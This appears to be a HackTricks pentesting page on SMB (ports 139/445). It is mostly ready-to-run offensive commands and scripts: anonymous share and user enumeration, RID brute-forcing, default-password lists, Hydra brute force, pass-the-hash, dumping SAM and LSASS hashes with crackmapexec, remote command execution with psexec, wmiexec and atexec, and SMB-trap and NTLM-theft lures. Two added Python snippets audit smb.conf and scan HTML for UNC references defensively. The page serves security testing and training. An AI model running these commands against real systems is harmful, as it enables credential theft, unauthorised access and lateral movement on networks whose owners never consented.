# 139,445 - Pentesting SMB
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## **Port 139**
_**Network Basic Input Output System**_** (NetBIOS)** is a software protocol designed to enable applications, PCs and desktops within a local area network (LAN) to interact with network hardware and **facilitate the transmission of data across the network**. Software applications operating on a NetBIOS network are identified and located through their NetBIOS names, which can be up to 16 characters long and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a command to "call" another application (acting as the server) over **TCP port 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
Technically, port 139 is referred to as ‘NBT over IP’, whereas port 445 is identified as ‘SMB over IP’. The acronym **SMB** stands for ‘**Server Message Block**’, a protocol also known in modern usage as the **Common Internet File System (CIFS)**. As an application-layer network protocol, SMB/CIFS is primarily used to provide shared access to files, printers and serial ports, and to support various other forms of communication between nodes on a network.

For instance, in the context of Windows, SMB can operate directly over TCP/IP on port 445, eliminating the need for NetBIOS over TCP/IP. Conversely, on other systems the use of port 139 is observed, indicating that SMB is running together with NetBIOS over TCP/IP.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
The **Server Message Block (SMB)** protocol, operating in a **client-server** model, is designed to regulate **access to files**, directories and other network resources such as printers and routers. Used primarily within the **Windows** family of operating systems, SMB ensures backward compatibility, allowing devices running newer versions of Microsoft's operating system to interoperate with those running older versions. Additionally, the **Samba** project offers a free software implementation of SMB for **Linux** and Unix systems, enabling cross-platform communication through SMB.

Shares, representing **arbitrary parts of the local file system**, can be offered by an SMB server, which makes the hierarchy visible to a client partly **independent** of the server's actual structure. **Access Control Lists (ACLs)** define the **access rights** and allow **fine-grained control** over user permissions, including attributes such as **`execute`**, **`read`** and **`full access`**. These permissions are assigned per share to individual users or groups and are distinct from the local permissions set on the server.
### IPC$ Share
Access to the IPC$ share can be obtained through an anonymous null session, allowing interaction with services exposed via named pipes. The `enum4linux` utility is useful for this purpose. Used properly, it can obtain:
* Information on the operating system
* Details on the parent domain
* A list of local users and groups
* Information on available SMB shares
* The effective system security policy

This functionality is important for network administrators assessing the security posture of SMB (Server Message Block) services. `enum4linux` provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential weaknesses and ensuring that SMB services are properly secured.
```bash
enum4linux -a target_ip
```
The above command is an example of how `enum4linux` can be used to perform a full enumeration against the target specified by `target_ip`.
## What is NTLM
If you don't know what NTLM is, or you want to know how it works and how it can be abused, this page about **NTLM**, which explains **how the protocol works and how you can take advantage of it**, will be very interesting:
{% content-ref url="../../windows-hardening/ntlm/" %}
[ntlm](../../windows-hardening/ntlm/)
{% endcontent-ref %}
## **Server Enumeration**
### **Scan** a network searching for hosts:
```bash
nbtscan -r 192.168.0.1/24
```
### SMB server version
To look for possible exploits for the SMB version in use, it is important to know which version is running. If this information does not appear in the output of other tools, you can:
* Use the **MSF** auxiliary module _**auxiliary/scanner/smb/smb\_version**_
* Or this script:
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# The capture interface (tap0) is hardcoded; change it to match your setup.
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Search exploit**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Possible** Credentials
| **Username(s)** | **Common passwords** |
| -------------------- | --------------------------------------- |
| _(blank)_ | _(blank)_ |
| guest | _(blank)_ |
| Administrator, admin | _(blank)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### Brute Force
* [**SMB brute force**](../../generic-methodologies-and-resources/brute-force.md#smb)
### SMB Environment Information
### Obtain Information
```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Enumerate users, groups & logged on users
This information should already have been gathered by enum4linux and enum4linux-ng.
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### Enumerate local users
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
Oneliner
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - Enumerate local users
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Enumerating LSARPC and SAMR with rpcclient**
{% content-ref url="rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](rpcclient-enumeration.md)
{% endcontent-ref %}
### GUI connection from Linux
#### In the terminal:
`xdg-open smb://cascade.htb/`
#### In a file browser window (nautilus, thunar, etc.)
`smb://friendzone.htb/general/`
## Shared Folders Enumeration
### List shared folders
It is always recommended to check whether you can access anything; if you don't have credentials, try using **null credentials/guest user**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<LM>:<NT>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #With creds
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Pass-the-Hash
```
### **Connect/List a shared folder**
```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient

#List with smbmap, without folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<LM>:<NT>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Manually enumerate Windows shares and connect to them**
It may be that you are not allowed to list the shares of the host machine, so when you try to enumerate them it looks as if there are no shares to connect to. It is therefore worth trying to connect to shares manually. To enumerate shares manually, look for responses such as NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME when using a valid session (e.g. a null session or valid credentials). These indicate whether the share exists but you have no access to it, or whether the share does not exist at all.

Common share names for Windows targets are:
* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON

(Common share names from _**Network Security Assessment 3rd edition**_)

You can try to connect to them using the following command:
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```
Or this script (using a null session):
```bash
#!/bin/bash
ip='<IP>' # target host
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in "${shares[@]}"; do
    output=$(smbclient -U '%' -N "\\\\$ip\\$share" -c '')
    if [[ -z $output ]]; then
        echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
    else
        echo "$output" # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    fi
done
```
Examples
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Enumerate shares from Windows / without third-party tools**
PowerShell
```powershell
# Retrieves the SMB shares on the local computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
Get-SmbShare -CimSession "<computername>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
CMD console
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC Snap-in (graphical)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (graphical): enter `\\<ip>\` to see the available non-hidden shares.
### Mount a shared folder
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Download files**
Read the previous sections to learn how to connect with credentials/Pass-the-Hash.
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```
```bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```
Commands:
* mask: specifies the mask used to filter the files within the directory (e.g. "" for all files)
* recurse: toggles recursion on (default: off)
* prompt: toggles prompting for filenames off (default: on)
* mget: copies all files matching the mask from the host to the client machine

(_Information from the manpage of smbclient_)
### Domain Shared Folders Search
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Especially interesting files in shares are **`Registry.xml`**, which **may contain passwords** for users configured with **autologon** via Group Policy, and **`web.config`** files, which contain credentials.

{% hint style="info" %}
The **SYSVOL share** is **readable** by all authenticated users in the domain. There you may **find** many different batch, VBScript and PowerShell **scripts**.\
You should **check** the **scripts** inside it, as you may **find** sensitive information such as **passwords**.
{% endhint %}
## Read Registry
You may be able to **read the registry** using discovered credentials. Impacket **`reg.py`** lets you try:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## Post Exploitation
The **default config** of a **Samba** server is usually located in `/etc/samba/smb.conf` and might contain some **dangerous settings**:

| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Allow listing the available shares in the current share? |
| `read only = no` | Forbid the creation and modification of files? |
| `writable = yes` | Allow users to create and modify files? |
| `guest ok = yes` | Allow connecting to the service without a password? |
| `enable privileges = yes` | Honor privileges assigned to a specific SID? |
| `create mask = 0777` | What permissions must be assigned to newly created files? |
| `directory mask = 0777` | What permissions must be assigned to newly created directories? |
| `logon script = script.sh` | What script needs to be executed on the user's login? |
| `magic script = script.sh` | Which script should be executed when the script gets closed? |
| `magic output = script.out` | Where does the output of the magic script need to be stored? |

The `smbstatus` command gives information about the **server** and about **who is connected**.
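As an added example that is not part of the original page, the following Python script audits an `smb.conf` for the settings listed in the table above, folding Samba's synonyms (`writeable`, `write ok`, `public`) and treating `read only = no` and `writable = yes` as the same condition; the sample configuration and the finding messages are constructed for the demo.

```python
import configparser

# Constructed sample smb.conf for this demo; it is not taken from any real host.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   enable privileges = yes

[public]
   path = /srv/public
   guest ok = yes
   read only = no          ; same effect as 'writable = yes'
   create mask = 0777
   directory mask = 0777
   magic script = script.sh
   magic output = script.out

[private]
   path = /srv/private
   guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1", "on"}
# Samba accepts several spellings for the same option; fold them to one name.
SYNONYMS = {"writeable": "writable", "write ok": "writable", "public": "guest ok"}

def normalise_option(name):
    key = " ".join(name.lower().split())
    return SYNONYMS.get(key, key)

def parse_smb_conf(text):
    """Return {section: {option: value}} using Samba's case-insensitive,
    whitespace-tolerant option names ('#' and ';' both start comments)."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",),
                                      comment_prefixes=("#", ";"),
                                      inline_comment_prefixes=("#", ";"),
                                      empty_lines_in_values=False)
    cp.optionxform = normalise_option
    cp.read_string(text)
    return {s: dict(cp.items(s)) for s in cp.sections()}

def is_true(value):
    return value.strip().lower() in TRUE_VALUES

def world_writable_mask(value):
    """True if an octal create/directory mask grants write to group or others."""
    try:
        return int(value, 8) & 0o022 != 0
    except ValueError:
        return False

def audit_smb_conf(text):
    """Return (section, option, value, finding) tuples for the risky settings
    from the table above. Values set in [global] are defaults for every share."""
    findings = []
    for section, opts in parse_smb_conf(text).items():
        if section == "global" and is_true(opts.get("enable privileges", "no")):
            findings.append((section, "enable privileges", "yes", "SID privileges honoured"))
        guest = is_true(opts.get("guest ok", "no"))
        # 'writable = yes' and 'read only = no' mean the same thing in Samba.
        writable = is_true(opts.get("writable", "no")) or not is_true(opts.get("read only", "yes"))
        if guest:
            findings.append((section, "guest ok", "yes", "usable without a password"))
        if writable:
            findings.append((section, "writable", "yes", "clients can create/modify files"))
        if guest and writable:
            findings.append((section, "guest ok + writable", "yes", "anonymous write access"))
        for mask in ("create mask", "directory mask"):
            if mask in opts and world_writable_mask(opts[mask]):
                findings.append((section, mask, opts[mask], "group/other write bits set"))
        for opt in ("logon script", "magic script", "magic output"):
            if opt in opts:
                findings.append((section, opt, opts[opt], "server-side script hook"))
    return findings
```

Run it against the real file with `audit_smb_conf(open("/etc/samba/smb.conf").read())`; the `[private]` section in the sample produces no finding, which shows a read-only, non-guest share passes.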
## Authenticate using Kerberos
You can **authenticate** to **Kerberos** using the **smbclient** and **rpcclient** tools:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **Execute Commands**
### **crackmapexec**
crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec**, with **wmiexec** being the **default** method. You can indicate which option you prefer with the `--exec-method` parameter:
```bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Execute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <NTHASH> #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
Both options **create a new service** (using _\pipe\svcctl_ via SMB) on the victim machine and use it to **execute something** (**psexec** **uploads an executable file to the ADMIN$ share**, while **smbexec** points the service to **cmd.exe/powershell.exe** and puts the payload in the arguments --**file-less technique**--).\
**More info** about [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
In **kali** they are located in /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Using the **parameter** `-k` you can authenticate against **Kerberos** instead of **NTLM**.
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
Stealthily executes a command shell without touching the disk or starting a new service, using DCOM via **port 135**.\
In **kali** they are located in /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@] #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Using the **parameter** `-k` you can authenticate against **Kerberos** instead of **NTLM**.
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
Executes commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located in /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```
## Impacket reference
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
## **Brute-force user credentials**
**This is not recommended; you could lock out an account if you exceed the maximum allowed attempts.**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB relay attack
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network and **relays** them to a **target machine**. If the authentication **session succeeds**, it automatically drops you into a **system shell**.\
[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
The Windows library URLMon.dll automatically tries to authenticate to the host when a page attempts to access some content via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`

This happens with the functions:
* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream

These are used by some browsers and tools (such as Skype).
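As an added, defender-side example that is not from the original page: a small Python scanner that finds the kind of auto-fetched UNC and `file://`/`smb://` references described above in HTML content (mail bodies, hosted pages), so such lures can be flagged before a client renders them and leaks an authentication attempt. The sample HTML is constructed; the `img src="\\10.10.10.10\..."` tag mirrors the pattern quoted above.

```python
import re
from html.parser import HTMLParser

# Constructed sample page for this demo; the UNC image tag mirrors the
# pattern quoted above, the other references are benign controls.
SAMPLE_HTML = r"""<html><body>
<img src="https://example.com/logo.png">
<img src="\\10.10.10.10\path\image.jpg">
<a href="file://\\10.10.10.10\share\doc.docx">report</a>
<img src="file:///C:/Users/Public/local.png">
</body></html>"""

# Attributes a renderer fetches without a click; each one can carry a
# UNC path (\\host\share\...) or a file:// / smb:// URL naming a remote host.
AUTO_FETCH_ATTRS = {"src", "href", "background", "data", "poster"}
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\/]+)[\\/]")
FILE_URL_RE = re.compile(r"^(?:file|smb):(?://)?(?:\\\\|//)?(?P<host>[^\\/]+)[\\/]", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def remote_host(value):
    """Return the host named by a UNC path or file:/smb: URL, else None.
    Drive-letter file URLs (file:///C:/...) and localhost are not remote."""
    m = UNC_RE.match(value.strip()) or FILE_URL_RE.match(value.strip())
    if not m or m.group("host").lower() in LOCAL_HOSTS:
        return None
    return m.group("host")

class UncReferenceFinder(HTMLParser):
    """Collect (tag, attribute, host, raw value) for auto-fetched remote paths."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is not None and name in AUTO_FETCH_ATTRS:
                host = remote_host(value)
                if host:
                    self.hits.append((tag, name, host, value))

def find_unc_references(html):
    """Parse HTML and return every auto-fetched reference to a remote SMB/UNC host."""
    parser = UncReferenceFinder()
    parser.feed(html)
    parser.close()
    return parser.hits
```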
![Source: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (358).png>)
### SMBTrap using MitMf
![Source: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (892).png>)
## NTLM Theft
Similar to SMB trapping, planting malicious files on a target system (via SMB, for example) can elicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](./#smb-relay-attack).

[See: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## HackTricks Automatic Commands
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```